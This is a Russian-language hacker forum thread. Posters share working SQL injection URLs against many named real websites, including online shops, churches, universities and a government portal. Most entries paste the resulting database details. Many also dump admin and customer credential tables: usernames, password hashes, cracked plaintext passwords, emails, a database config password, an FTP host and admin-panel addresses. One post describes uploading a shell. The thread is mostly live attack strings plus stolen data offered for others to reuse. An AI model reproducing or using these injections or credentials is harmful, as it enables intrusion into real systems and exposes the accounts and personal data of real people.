SQL Инъекции

Для Военный , молодой человек..никогда не сдавайся
1.http://www.usadba.ru/city/flat/5481/?-1+order+by+5--

version()- 5.0.67
user() - [email protected]
database()-base_usadba

слепая скуля...поможет нам СИПТ небезизвестный... посимвольный брут и вуаля

с 1-16 стандартные таблички... а дальшe

Getted String number 17:a_flats

Getted String number 18:a_flats_arenda

Getted String number 19:a_houses

Getted String number 20:b_dormitory_arenda

Getted String number 21:drm_s_highway

Getted String number 22:l_house_area

Getted String number 23:l_house_informal

Getted String number 24:mmedia_city

Getted String number 25:mmedia_drm

Getted String number 26:mmedia_house

ну я думаю понятно...ковыряй дальше сам.... удачи

 

Code:

http://heyyou.ru/?page=proooblogs&id=-1+union+select+1,2,3,version(),5,6,7,8,9--

 

Code:

http://www.ypr.org.au/view_history.php?historyID=-6'+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION())/*
[b]User:[/b] ypr@localhost
[b]Database:[/b] ypr_org_au
[b]Version:[/b] 4.1.20

http://www.nihonjujutsu.com/history.php?HistoryID=-7+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
[b]User:[/b] jujutsu@localhost
[b]Database:[/b] jujutsu
[b]Version:[/b] 5.0.32-Debian_7etch8-log

http://www.onegi.com.tw/AboutOneGi/History_Content.php?HistoryID=-2+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20--
[b]User:[/b] onegi@localhost
[b]Database:[/b] onegi
[b]Version:[/b] 5.1.30-community

http://www.xinanchem.com/historyxiangxi.php?historyId=-143+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5/*
[b]User:[/b] root@localhost
[b]Database:[/b] wynca2
[b]Version:[/b] 4.0.13-nt

http://www.wynca.com/en/historyxiangxi.php?historyId=-110+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5/*
[b]User:[/b] root@localhost
[b]Database:[/b] wynca2 
[b]Version:[/b] 4.0.13-nt

http://www.welltec.com.hk/news_see.php?thisid=-18+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
[b]User:[/b] root@localhost 
[b]Database:[/b] welltec_com_hk 
[b]Version:[/b] 5.0.26-community-nt

http://www.salmonsupporters.com/detailsupporters.php?thisid=-32+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10,11,12/*
[b]User:[/b] [email protected]
[b]Database:[/b] wssDBadmin
[b]Version:[/b] 4.1.22-max-log

http://www.lyrics.nl/showsong.php?songid=28151&artiestid=552&historyid=-12632+UNION+SELECT+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3/*
[b]User:[/b] filmenmu@localhost
[b]Database:[/b] filmenmu
[b]Version:[/b] 4.1.22

http://www.cosmos-ml.com/en/news_see.php?thisid=-1+UNION+SELECT+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6/*
[b]User:[/b] root@localhost
[b]Database:[/b] dg_cosmos
[b]Version:[/b] 5.0.26-community-nt

http://www.orcaschurch.org/Church_Notes.php?thisID=-28+union+select+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5%20--
[b]User:[/b] orcaschurch@localhost
[b]Database:[/b] orcaschurch
[b]Version:[/b] 5.0.58

http://www.gvchristian.com/videopopup.php?thisid=307+UNION+SELECT+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10/*
[b]User:[/b] root@localhost
[b][b]Database:[/b]/b] fatguys_gvcc
[b]Version:[/b] 5.0.45-Debian_1ubuntu3-log

Это за вчера =). Мои скули. Крутите...

 

dofp_ab@localhost
4.1.22-standard
dofp_db

Database Version: 5.0.46-enterprise-gpl-log
Database name: espin_dbo
User name: [email protected]

PageRank 7

Database Version: 5.0.32-Debian_7etch5-log
Database name: poetry
User name: [email protected]

User:[email protected]
Version:5.0.67-log
Database:carbonrecords


Ну и законченный магазинчик на вкусное -)

http://www.europanet.com.br/site/index.php?cat_id=32&pag_id=-13673+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,version(),45,46,47,48,49,50,51,52,53,54,55--


Database Version: 5.0.18-log
Database name: europanet
User name: arima@localhost

В общем там 38 Баз для всех пойдет и спам и аси кард итд...


Getting Data from table loja_admin (11 Rows) from database eurobest_commerce
Fields id_admin:usuario:senha:superadmin

[4]:9:carmina:5268582b6eaed9fee8a2658b4f57707a:0
[5]:10:luiz:ebea0b104bf6f36f1eb2ddc931d666ea:1
[6]:11:internet:b7b791e873f143d5318310e59022175d:1
[7]:12:claudia:5268582b6eaed9fee8a2658b4f57707a:0
[8]:13:joana:0ffbdca648adb61d5535ff063e70cb3f:1 пароль amidala
[9]:14:licia:63c193707ac085b2f8dd3115f546d6ed:0



Fields usuario:senha:admin_cat:admin_ftp

[1]:crnarciso:317a77f27ecd0390:0:
[2]:siqueira:0f1209ee38606424:0:
[3]:joice:0e9df198295e5bc8:0: Пароль joice
[4]:erick:350ef7027f408372:0:
[5]:ivan:323ef54f34efa5cb:4: Пароль 120585
[6]:diogo:081c619177dbefa1:0:
[7]:expedicao:6acea1340bfcbf5e:13:
[8]:manu:5210fdc242391e30:575:
[9]:livia:0ce5dd0f706534ab:600: Пароль fotografe
[10]:humberto:6460f98b14d0ae2e:572:/animeinvaders/
[11]:rodolfo:4151a9df6c9924ac:617:/motomax/
[12]:mariofit:136940302c5235c7:617: Пароль ducati
[13]:chris:2d2643c419314e1b:430:/sucesso/
[14]:gameblog:36dda20c5784bd81:825:
[15]:luiz:36dda20c5784bd81:832:/gameblog/
[16]:nelson:36dda20c5784bd81:834:/gameblog/
[17]:leandro:36dda20c5784bd81:831:/gameblog/
[18]:julebas:36dda20c5784bd81:830:/gameblog/
[19]:fhazevedo:36dda20c5784bd81:828:/gameblog/
[20]:sombrates:36dda20c5784bd81:835:/gameblog/
[21]:trivella:36dda20c5784bd81:836:/gameblog/
[22]:humberto_gb:36dda20c5784bd81:829:/gameblog/
[23]:aida:449a67e9524397b5:2:/natureza/ Пароль plantas
[24]:junior:63a09b66402d69ac:977:/xbox/
[25]:marco:36ad6fa45d632cd4:1:/ Пароль хэш MySQL:36ad6fa45d632cd4ortugal FTP 200.229.132.34:21
[26]:adriano:44d383005b181d39:35: Пароль marley
[27]:luciane:26ae382f4d7de2e9:375:/sucesso/ Пароль lembrar
[28]:humbertoblog:36dda20c5784bd81:829:
[29]:flavia:36dda20c5784bd81:971:/gameblog/
[30]:gustavo:36dda20c5784bd81:970:/gameblog/

В общем самое важное было это залить шел..
Прошел в админку через тело

marco:36ad6fa45d632cd4:1:/ Пароль хэш MySQL:36ad6fa45d632cd4ortugal FTP 200.229.132.34:21

Ну и спокойно залил.
Далее раскопал конфиг там важная персона

// Database username
$phpAds_config['dbuser'] = 'arima';

// Database password
$phpAds_config['dbpassword'] = 'spectroman21';

Доступ ко всем базам!

save mode отключен -)

Наслаждайтесь.


PostgreSQL 7.2.7 on i686-pc-linux-gnu, compiled by GCC 2.96

http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,version()--&r=/list.php

http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,TABLENAME/**/from/**/PG_TABLES+LIMIT+1,1--&r=/list.php

itemimages
CATEGORIES
items
pg_aggregate
pg_am
pg_amop
pg_amproc
pg_attrdef
pg_attribute
pg_xactlock
pg_type
pg_trigger
pg_statistic
pg_shadow
pg_rewrite
pg_relcheck
pg_proc
pg_operator
pg_opclass
pg_listener
pg_largeobject
pg_language
pg_inherits
pg_index
pg_group
pg_description
pg_database
pg_class

Дальше не могу может кто сможет....




DATAMP - Directory of American Tool and Machinery Patents

http://www.datamp.org/displayPatent.php?id=809809809809837107+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--&pn=15

Database Version: 5.0.67-community-nt
Database name: datamp
User name: datamp_owner@localhost





http://www.datamp.org/displayPatent.php?id=809809809809837107+UNION+SELECT+1,2,3,4,5,CONCAT((SELECT+CONCAT(steward_id,username,password,name,email)+FROM+datamp.data_stewards+LIMIT+19,1)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--



[1]:2:rbrendler:513eb98aea47a672a8f3536970b958fe:Ralph Brendler:[email protected]
[2]:3:jjoslin:0869cf46fd51daaf1ee9ad0a2d2dba6a:Jeff Joslin:[email protected]
[3]:4:blpenn:a16aa06b2f0474f3a361be2bfadb9070:Brian Pennington:[email protected]
[4]:5:sreynolds:d41d8cd98f00b204e9800998ecf8427e:Steve Reynolds:[email protected]
[5]:6:groberts:7db90444501f73dbb69c90ce7abdc329:Gary Roberts:[email protected]
[6]:7:khays:eb416ed484bb765f198c8f43d95ccee8:Kirk Hays:[email protected]
[7]:8:cswingle:d41d8cd98f00b204e9800998ecf8427e:Chris Swingley:[email protected]
[8]:9:jmcvey:0869cf46fd51daaf1ee9ad0a2d2dba6a:Jeff McVey:[email protected]
[9]:11:datchuck:61bc4419f39a648db27277c551367a5a:Jim Erdman:[email protected]
[10]:13:cmatthews:1697d46fbd40f5fb68babd2776fd9d0a:Carl Matthews:[email protected]
[11]:14:dmcconnell:c4ce0603e30080fa5f54e59a94d7921fon McConnell:[email protected]
[12]:15:rallen:5c40e218bd15cc65899c3ab8905c4656:Russ Allen:[email protected]
[13]:16:sschulz:d44c2e495958b2062ae1049b20b4aa35:Stan Schulz:[email protected]
[14]:17:motllahsram:5abf97a52e1d08577d1294d9a46d0988:Tom Marshall:[email protected]
[15]:18:joelr:ca3df0a222b067dbce8712a979bc9145:Joel Havens:[email protected]
[16]:19:murness:c6dafa4f1768d773a4a877f663b59629:Mike Urness:[email protected]
[17]:20:tpobrienjr:dc787b140dc4fc95ec5fd3ee4e361c6d:Tom O'Brien:[email protected]
[18]:21:mwoodard:e15c0f3c29d61392357cbf71c9486e26:Mark Woodard:[email protected]
[19]:23:mconley:7ac80e96ae9183e4f5811924f0606203:Mark Conley:[email protected]


Понравился вот этот ящик -) [email protected]

 

интернет магазин аксессуаров и подарков
табла с паролями и мылами

Code:

http://eluxus.com.ua/catalog/index.php?_a=view&_cat=-73 UNION SELECT 1,2,concat_ws(char(58),email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM useraccounts --

админка
http://eluxus.com.ua/admin/
кто админ незнаю, ройте =)

магазин топмобила

Code:

http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,concat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7,8,9,10,11,12,13,14 --

version::5.0.67-community
user::shmel_admin@localhost
database::shmel_mobiles
Вывод всех таблиц

Code:

http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12,13,14 FROM INFORMATION_SCHEMA.TABLES --

какой то Белорусский чат

Code:

http://www.irc.by/modules/articles/article.php?id=-16 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,USER(),DATABASE(),VERSION()),8,9,10,11,12,13,14,15,16,17,18,19,20 --

version::4.1.25
User::ircby_xoops@localhost
database::ircby_xoops

интернет бутик для женщин

Code:

http://all-perfumes.com.ua/index.php?act=cat&id=-66 UNION SELECT concat_ws(0x3a,USER(),DATABASE(),VERSION()),2,3,4,5 --

version::4.1.12-standard-log
user::drnova_dnj0Pw3@localhost
database::drnova_apP4n1c7

 

Магазинчик -)

Database Version: 5.0.67-community-log
Database name: zoomacti_products
User name: zoomacti_dare2li@localhost

Fields emailassword

[1][email protected] :ghijkl
[2]:[email protected] :lackluster
[3]:[email protected] :ghijkl
[4]:[email protected] :mydol
[5]:[email protected] :markizen
[6]:[email protected] :d2ljunik
[7]:[email protected] :buster1
[8]:[email protected] :edel9889
[9][email protected] :turbo
[10]:[email protected] :bruin85
[11]:[email protected] :ila105bs
[12]:[email protected] :marketing
[13]:[email protected] :dissert
[14]:[email protected] :bosscake
[15]:[email protected] :qqqqqqqqqq
[16]:[email protected] :ddddd
[17]:[email protected] :aa
[18]:[email protected] :987
[19]:[email protected] :ggggg

Итд...


И еще один магазинчик

Database Version: 5.0.45
Database name: jfa
User name: jfa@localhost

 

http://www.ambisousa.pt/php/inserir_comentario.php?id=-1+union+select+1,2,3,4,login,passwd+from+users--


http://www.ambisousa.pt/admin/


login:ambisousa
pass:sousinha

Куяк!!!

 

Code:

http://sim-cat.com/cats.php?sex=-0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&lang=eng

4.0.27-max-log

Code:

http://www.stylecat.ru/cats.php?sex=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29--&breed=kbo&lang=rus

5.0.51a-log 2

 

The Winston Churchill Memorial Trust

Ниже представленный запрос такого вида, из-за отсутствия иного выхода по причине следующей ошибки:
Fatal error: Database error #1267: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
возникшая, к примеру, при функциях user(), database(),version(). А поля таблиц проходят без проблем.

database():churchilltrust
user():winston@localhost

Code:

http://www.churchilltrust.com.au/news.php?id=-2+union+select+1,password,3,username,5,6+from+users/*

username:admin
password:4dm1n

 

магазин подарков

Code:

http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,3,concat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7,8,9,10,11,12,13,14,15%20%20--

version::4.1.22
user::u_chudesa@localhost
database::chudesa
в табле users были следующие персоны:
login:test login:vika
passwors:123 passwordjhbr

Code:

http://www.chudesa.com.ua/?page=prod_detail&prod_id=-456%20UNION%20SELECT%201,2,login,pass,5,6,7,8,9,10,11,12,13,14,15%20from%20users%20limit%200,1%20--

ещё один магазин подарков

Code:

http://www.podarunky.kiev.ua/showpage.php?id=9999999%20UNION%20SELECT%201,2,3,c oncat_ws(0x3a,USER(),DATABASE(),VERSION()),5,6,7%2 0%20--

version::4.1.22-log
user::sitemaker@localhost
database::giftBase

Магазин медикаментов MEDIMAG

Code:

http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws(0x3a,USER(),DATABASE(),VERSION()),10,11,12,13,14,15,16,17,18,19,20%20--

version::4.1.22
user::u_medimag_ap@localhost
database::medimag_apteka

табла с паролями

Code:

http://www.medimag.com.ua/index.php?view=products&razdel=4&sub=38&id=-278%20UNION%20SELECT%201,2,3,4,5,6,7,login,password,10,11,12,13,14,15,16,17,18,19,20%20from%20users%20--

login::admin
password::shutnick

Вход в админку через сайт, можно реально оформить заказ и подтвердить его.

Книжный магазин

Code:

http://market.factor.ua/books.php?book_id=-811%20UNION%20SELECT%201,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20--

version::4.1.20
user::market@localhost
database::market

 

PR7 webUser@localhost:5.0.27-community-nt-log:rc-web

 

version: 5.0.22

 

Unitech

user:[email protected]
database:uniroot
version:4.1.22-max-log

http://unitech.com.az/admin/
username:uni
password:777

 

http://www.uztest.ru
на сайте имеется база данных на более чем 7,5 тыс учителей=))

db - uztest3_temp
version - 5.0.51a
user - uztest3_temp@localhost
админка - login: oldteacher pass:591121
админка форума - login:admin pass:goldfire757
P.s все пароли выводяться в не зашифрованном виде=)))

 

http://www.valitsus.ee/index.php?rep_id=294943&tpl=1007%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&external=&search=&aasta=

Таблички:
admin,config,tbl,version

http://www.valitsus.ee/brf/admin

Доступ закрыт по айпи,если не ошибаюсь в очередной раз =______________=

 

Сайт турнира по программированию=) http://www.icl.ru

админка - pass:wordplay login: pupucya
пароли админов зашифрованы в MYSQL-4.x-Hash
вывод информации с пользователями:

пароли пользователей в незашифрованном виде ;-)
бд- turnir;
версия бд - 5.0.15-nt
юзер - [email protected]

 

Code:

http://www.bioticregulation.ru/foto/show.php?ng=5&lang=en&nc=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13--
http://www.bioticregulation.ru/foto/show.php?ng=5&lang=en&nc=-1+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=0x7070656c626132325f666f746f--

Code:

http://www.inta.gatech.edu/faculty-staff/listing.php?uID=-20+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19--

Code:

http://dms.dartmouth.edu/faculty/facultydb/view.php?uid=-139+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--

Code:

таблицы: biblio,facultydb,profile,users
колонки(users): uid,name,add_perm,edit_perm,delete_perm,superuser
колонки(profile): id,facultydb_id,cv_filename,dv,bio_filename,bio
колонки(facultydb): uid,Personal_ID,status,Name_DND,Name_First,Name_Middle,Name_Last,Name_Prefix,Name_Suffix,Position_Title,Birth_Date,Department,Degree,Education,Interests,Programs,Courses,Grant_Support,Core_Facilities,URL,Telephone_Number,Facsimile_Number,Email_Address,Office,Assistant,Asst_Telephone,Asst_Email,Address1,Address2,Address3,City,State,Zip_Code
колонки(biblio): Title,Authors,Source,PMID,Medline_AN,id,uid

 

uncga@localhost:4.1.20-log:uncga

 

Code:

http://market-doors.ru/show_cat2.php?grid=-5+union+select+concat_ws(0x3a,username,password)+FROM+admin

[email protected]
5.0.67-log
u55818

admin:588eb5181b3ba704
http://market-doors.ru/admin.php

Code:

http://www.kubanjob.ru/vacanc.php?id=-15948+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20

Uwww2727S@localhost
4.1.21-log
udb2727

Code:

http://arendyi.ru/detail.php?de=-2362+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11

[email protected]
5.0.67-log
u8766_arendyi

http://www.arendyi.ru/login.php

Ольга:11111,
Ольга:777,
Ольга:222222,
Ольга:jkmuf,
Рая:2332

Code:

http://allookna.ru/?page=-19+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11

[email protected]
5.0.67-log
u52548

admin:fkkjadmin
http://allookna.ru/admin/

Code:

http://shark63.ru/index.php?cat=-3+union+select+concat_ws(0x3a,user(),version(),database()),2--&subcat=0&det=0

[email protected]
5.0.67-log
u57848

- logins
shark:dZral

- logins_base
shark:dZral,avtorental:sc56Rnt,hertz:hop42gDr,shark:ro6tSf35,avtorental:HQr57tu,hertz:htf47gH

- logins_buh_flagman
shark:dZral,shark:sdf7A

- logins_buh_ssp
shark:dZral,shark:sdf7A

http://shark63.ru/buh_shark
http://shark63.ru/buh_flagman
http://shark63.ru/buh_ssp
http://shark63.ru/base
http://shark63.ru/client

Code:

http://www.tetevent.ru/cat.php?bid=-37+union+select+1,concat_ws(0x3a,user(),version(),database())--

[email protected]
5.0.67-log
u64338

Code:

http://www.tetevent.ru/cat.php?bid=-37+union+select+1,concat_ws(0x3a,name,pass)+FROM+users--

admin:1

http://www.tetevent.ru/admin/

 

Berkeley.edu PR 9

5 ветка.. но нифига (